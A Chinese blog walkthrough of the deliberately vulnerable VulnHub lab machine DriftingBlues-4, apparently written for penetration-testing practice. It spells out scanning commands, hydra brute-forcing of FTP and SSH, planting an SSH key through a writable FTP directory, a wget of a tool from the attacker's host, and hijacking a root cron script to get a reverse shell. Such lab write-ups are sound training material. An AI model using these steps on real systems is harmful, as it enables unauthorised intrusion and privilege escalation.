靶机渗透练习04-driftingblues4

已于 2022-03-27 20:48:44 修改
阅读量2.2k 收藏
点赞数 1
分类专栏: 和我一起来打靶! 文章标签: 渗透测试
于 2022-03-27 12:52:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Forces_/article/details/123771426
版权

靶机地址: https://www.vulnhub.com/entry/driftingblues-4,661

1、主机探活

arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)
masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号)
netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段)
nmap -sn 192.168.111.0/24

2、端口扫描

nmap -sS -A -sV -T4 -p- 192.168.111.15
21—ftp—ProFTPD
22—ssh—OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80—http—Apache httpd 2.4.38 ((Debian))

3、80端口分析
打开一看啥也没有,直接查看源代码,出现一串base64

Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09

解码得到:
go back intruder!!! dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==

再解码:
tight security drippin aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=

再解码:
i hope you're an employee L2ltZnVja2luZ21hZC50eHQ=

再解码......
/imfuckingmad.txt

访问后出现一堆奇怪的字符,应该是某种编码,放入在线网站探测一波

http://www.dcode.fr/cipher-identifier

发现是 Brainfuck 解密,然后进行解密
得到一张图片: /iTiS3Cr3TbiTCh.png

在这里插入图片描述
保存到本地用QR进行分析,或者直接使用在线二维码识别网站也行
在这里插入图片描述

得到一个url,访问看看(发现无法访问,那应该是需要科学上网了)
在这里插入图片描述
4、获得一些用户名,存为user.txt,将其做成字典用于21、22端口的爆破

luther
gary
Hubert
clark

密码字典使用kali自带的rockyou.txt文件

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt  192.168.111.15 ftp
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt  192.168.111.15 ssh

ssh爆破失败,ftp成功爆破出一个账号密码:luther/mypics

5、登录ftp进行信息探测

ftp 192.168.111.15

在这里插入图片描述
发现hubert家目录具有777权限,所以我们的思路是在用户hubert的目录下写入私钥,来进行免密登录
6、我们在家目录创建.ssh目录,然后直接将kali的公钥重命名为authorized_keys,并把authorized_keys上传到该目录下

ftp 192.168.9.26
输入账户:luther
输入密码:mypics
cd hubert
mkdir .ssh
cd .ssh
put authorized_keys

ssh hubert@192.168.111.15

在这里插入图片描述
7、提权
本地目录下还有一个py文件,属主为root,内容是执行一个系统命令:为向/tmp/backdoor_testing文件中增加1
在这里插入图片描述
思路:如果它是个定时任务的话我们就可以修改emergenc.py文件,内容为反弹shell,然后当以root身份运行这个定时任务的时候我们就可以获得root权限的shell
那么如何判断它是否是个定时任务呢,这里推荐使用一个文件 pspy64,可以对进程文件进行监控

下载pspy64:wget http://192.168.111.7/pspy64
chmod +x pspy64
./pspy64

在这里插入图片描述
发现该python文件一分钟执行一次,所以是定时任务,执行我们的思路获得root权限
尝试将1.py覆盖掉原来的emergency.py,发现不行,权限不够,
但是用nano进行修改文件,并且保存为emergency.pyM,然后再尝试进行覆盖,发现覆盖成功,然后攻击机监听1234端口

在这里插入图片描述
等待反弹即可获得root shell
在这里插入图片描述
思路二:命令劫持提权

在 shell 中寻找 suid 程序: find / -perm -u=s -type f 2>/dev/null

发现一个不常见的程序 /usr/bin/getinfo
和driftingblues3靶机操作一模一样,参考之前的文章操作也可以获得root权限

完结散花~

参考:https://www.sec-in.com/article/1401
https://www.freebuf.com/articles/others-articles/278323.html

佛系的新仔
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
vulnhub--driftingblues:4
venu_s的博客
06-17 455
靶机介绍 difficult:easy goal:get flags download:https://www.vulnhub.com/entry/driftingblues-4,661/ 信息探测 主机发现 端口扫描 目录扫描 访问80端口 查看源代码,有一段base64加密的内容 base64解密,需要多次解密,发现/imfuckingmad.txt 访问/imfuckingmad.txt,是一段brainfuck加密的内容 解密发现一张图片 查看图片,是一张二维码 扫码,有一
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-4
Aluxian_的博客
06-17 990
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-4,661/ 下载好了把安装包解压 然后试用VMware即可。前言:这里又是DriftingBlues-2的问题 需要自己配网卡具体参考:h
[Vulnhub靶机] DriftingBlues: 4
haosha。的博客
02-06 2215
[Vulnhub靶机] DriftingBlues: 4靶机渗透思路及方法(个人分享)
DriftingBlues-4靶机进行渗透测试
zll___的博客
04-20 495
DriftingBlues-4靶机进行渗透测试
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
靶场练习第十四天~vulnhub靶场之dc-6
qq_57976347的博客
02-13 560
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接: 百度网盘 请输入提取码 提取码: bazx 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip 命令:sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -sV -p- 192.168.101.119 (2)看看详细信息 nmap -A -p- 192.168.101.119
vulnhub靶场之driftingblues-4
qq_58091216的博客
03-31 396
是 sync(linux同步命令,含义为迫使缓冲块数据立即写盘并更新超级块),那我尝试往 ftp 中的 hubert 文件中写入 ssh 密钥,猜测应该就会同步到 hubert 用户的家目录中,现在 ftp 中的 hubert 目录下创建 .ssh 目录。我们查看页面,没有发现任何有用的信息,我们进行查看源代码,发现一串base64编码,我们一会进行解密查看。什么也没有,目前我们掌握的信息,只有一串base64编码,我们进行解密查看。发现是Brainfuck编码,我们进行解密,发现是一个二维码。
Vulnhub靶机driftingblues 4
qq_48904485的博客
01-14 480
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues4(10.0.2.20)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-4,661/
VulnHub 之 DRIFTINGBLUES: 7
weixin_42075643的博客
04-28 802
Vulnhub是一个很好的靶机平台,想看官网点这里。 今天学习DRIFTINGBLUES: 7,点击这里下载哦~ 推荐使用virtualBox,我这里是VMware,看自己条件使用 难度:简单 基础练习,大佬可以绕过 接下来导入虚拟机,这里选择NAT模式,成功后,如图: 这里使用kali作为攻击机,首先查看kali的ip: 使用nmap来探测靶机ip: nmap -sS 192.198.81.0/24 可以看到有80端口,先去浏览器找找线索: 是一个network登录界面,试试若口令,爆破啥的
Vulnhub靶机driftingblues6_vh
weixin_43967893的博客
04-19 708
Vulnhub_driftingblues6 zip破解,php_reverse,脏牛提权
基于spring boot 的流浪动物管理系统毕业论文.docx
09-09
基于spring boot 的流浪动物管理系统毕业论文.docx
C语言经典算法100例 - 快捷方式.lnk
09-09
C语言经典算法100例 - 快捷方式.lnk
基于ssm的化妆品配方及工艺管理系统的设计与实现.docx
最新发布
09-09
基于ssm的化妆品配方及工艺管理系统的设计与实现.docx
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一) 在这篇文章中,我们将学习如何搭建Vulnhub靶机渗透环境,并学习JIS-CTF入门知识,以及蚁剑提权示例。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值